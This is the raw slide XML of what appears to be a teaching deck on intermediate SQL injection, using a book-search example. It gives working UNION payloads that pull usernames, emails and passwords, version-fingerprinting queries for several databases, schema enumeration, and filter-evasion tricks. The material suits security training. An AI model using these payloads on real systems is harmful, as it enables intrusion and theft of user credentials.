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  <p:sldId id="270" r:id="rId10"/>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="272" r:id="rId13"/>
    <p:sldId id="262" r:id="rId14"/>
    <p:sldId id="263" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="260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4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35BB-2175-A441-9488-F65A72C0496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78F6-B8BA-D14B-AD31-A644762A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205736/get-list-of-all-tables-in-oracle" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dba.stackexchange.com/questions/21266/understanding-oracles-all-tab-column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im@mailtothis.com" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:alice@mailinator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77" y="1907527"/>
            <a:ext cx="9144000" cy="2669299"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$$$$$$\            $$\                                                       $$\ $$\            $$\             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\_$$  _|           $$ |                                                      $$ |\__|           $$ |            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$$ |  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$\  $$$$$$\$$$$\   $$$$$$\   $$$$$$$ |$$\  $$$$$$\ $$$$$$\    $$$$$$\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$$ |  $$  __$$\\_$$  _|  $$  __$$\ $$  __$$\ $$  _$$  _$$\ $$  __$$\ $$  __$$ |$$ | \____$$\\_$$  _|  $$  __$$\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$$ |  $$ |  $$ | $$ |    $$$$$$$$ |$$ |  \__|$$ / $$ / $$ |$$$$$$$$ |$$ /  $$ |$$ | $$$$$$$ | $$ |    $$$$$$$$ |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$$ |  $$ |  $$ | $$ |$$\ $$   ____|$$ |      $$ | $$ | $$ |$$   ____|$$ |  $$ |$$ |$$  __$$ | $$ |$$\ $$   ____|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$$$$$$\ $$ |  $$ | \$$$$  |\$$$$$$$\ $$ |      $$ | $$ | $$ |\$$$$$$$\ \$$$$$$$ |$$ |\$$$$$$$ | \$$$$  |\$$$$$$$\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\______|\__|  \__|  \____/  \_______|\__|      \__| \__| \__| \_______| \_______|\__| \_______|  \____/  \_______|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                                                                                                              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                                                                                                              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                                                                                                              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$$$$$$\   $$$$$$\  $$\             $$$$$$\ $$\   $$\    $$$$$\ $$$$$$$$\  $$$$$$\ $$$$$$$$\ $$$$$$\  $$$$$$\  $$\   $$\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$$  __$$\ $$  __$$\ $$ |            \_$$  _|$$$\  $$ |   \__$$ |$$  _____|$$  __$$\\__$$  __|\_$$  _|$$  __$$\ $$$\  $$ |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$$ /  \__|$$ /  $$ |$$ |              $$ |  $$$$\ $$ |      $$ |$$ |      $$ /  \__|  $$ |     $$ |  $$ /  $$ |$$$$\ $$ |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\$$$$$$\  $$ |  $$ |$$ |              $$ |  $$ $$\$$ |      $$ |$$$$$\    $$ |        $$ |     $$ |  $$ |  $$ |$$ $$\$$ |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\____$$\ $$ |  $$ |$$ |              $$ |  $$ \$$$$ |$$\   $$ |$$  __|   $$ |        $$ |     $$ |  $$ |  $$ |$$ \$$$$ |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$$\   $$ |$$ $$\$$ |$$ |              $$ |  $$ |\$$$ |$$ |  $$ |$$ |      $$ |  $$\   $$ |     $$ |  $$ |  $$ |$$ |\$$$ |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\$$$$$$  |\$$$$$$ / $$$$$$$$\       $$$$$$\ $$ | \$$ |\$$$$$$  |$$$$$$$$\ \$$$$$$  |  $$ |   $$$$$$\  $$$$$$  |$$ | \$$ |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\______/  \___$$$\ \________|      \______|\__|  \__| \______/ \________| \______/   \__|   \______| \______/ \__|  \__|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             \___|                                                                                            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                                                                                                                        </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="10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92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  <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data (without blind injection techniques) you need to find at least one returned field that is a string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Results of subsequent string queries can be put in this string field and returned to the attacker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say you only have one string field returned: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SELECT author, year FROM books WHERE title = ‘1984’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But you want to pull username, email, and password in one query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How would you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9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concatenating sub-queries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1984’ UNION SELECT (SELECT username FROM users)||':'||(SELECT email FROM users)||':'||(SELECT password FROM users), NULL-- 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Which results in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT author, year FROM books WHERE title = ‘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1984’ UNION SELECT (SELECT username FROM users)||':'||(SELECT email FROM users)||':'||(SELECT password FROM users), NULL--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>returns: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 smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/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80788"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556380" y="5388670"/>
          <a:ext cx="813042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5210"/>
                <a:gridCol w="40652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 Orwell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bob:bob@gmail.com:PugsAreTheBest11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MSSQL and MySQL you can use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>@@version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>‘ UNION SELECT @@version, NULL, NULL--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Banner from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>v$version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>‘ UNION SELECT banner, NULL, NULL FROM  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>v$version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite_version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()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323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and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 the metadata table called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Contains all table and columns names in the DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MS-SQL and MySQL use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Oracle uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>user_tab_columns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQLite uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlite_master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1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>A’ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>table_name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column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, NULL, NULL, NULL FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://stackoverflow.com/questions/205736/get-list-of-all-tables-in-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>oracle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://dba.stackexchange.com/questions/21266/understanding-oracles-all-tab-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>columns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514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and column names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only have one string field to pull data through try concatenating results:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Oracle: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>||’:’||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>all_tab_columns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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MS-SQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’:’+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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MySQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT CONCAT(table_name,’:’,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLite: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT name||’:’||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sql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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sqlite_master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> WHERE type=‘table’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232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character codes for individual characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Oracle: CHR(41)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MS-SQL: CHAR(41)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MySQL: CHAR(41)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQLite: cast(X’41’ as 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comments between words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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT/*a*/username/*a*/FROM/*a*/users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can also be used to breakup keywords (in some cases)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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SEL/*a*/ECT username FR/*a*/OM users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7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Cleanly close the statements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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>‘ or 1=1--   =&gt;  ‘ or ‘1’=‘1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Union operator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This joins rows from another table into the results </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very powerful, but:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two result sets must have the same structure, with the same number of columns and compatible data types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must know the name of the database table and relevant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book search uses the following query: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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT author, title, publisher FROM books WHERE title = ‘1984’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Which returns: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78668"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1415142" y="4287762"/>
          <a:ext cx="680961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9873"/>
                <a:gridCol w="2269873"/>
                <a:gridCol w="2269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 Orwell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Secker and Warburg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union query to pull from the users table like so:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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1984’ UNION SELECT username, email, password FROM users --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which results in the following query: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SELECT author, title, publisher FROM books WHERE title = ‘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1984’ UNION SELECT username, email, password FROM users --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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returns: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85182"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1245809" y="3078238"/>
          <a:ext cx="6845907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1969"/>
                <a:gridCol w="2281969"/>
                <a:gridCol w="2281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r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Orwell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Secker and Warburg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 Roberts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jim@mailtothis.com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Screamingeagle</a:t>
                      </a:r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 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alice@mailinator.com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IloveC4ts123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0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incompatibility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the original query looks like this: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SELECT author, title, year, publisher FROM books WHERE title = ‘1984</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And the users table only has 3 columns: username, email, and password</a:t>
            </a:r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This: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2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SELECT author, title, publisher, year FROM books WHERE title = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1984’ UNION SELECT username, email, password FROM users --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You will get this error: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“query block has incorrect number of result columns”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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71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if the original query looks like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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SELECT author, title, year FROM books WHERE title = ‘1984</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And the users table has 3 string columns: username, email, and password</a:t>
            </a:r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This: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2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SELECT author, title, year FROM books WHERE title = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1984’ UNION SELECT username, email, password FROM users --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You will get this error: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“expression must have same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datatype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as corresponding expression”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5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of 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results of the injected query must have compatible data types, not necessarily the same type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Null can be converted into any data type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So If you don’t know a fields data type, use a Null!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Length incompatibility:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="3" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT author, title, publisher, year FROM books WHERE title = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1984’ UNION SELECT NULL, NULL, NULL, NULL --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
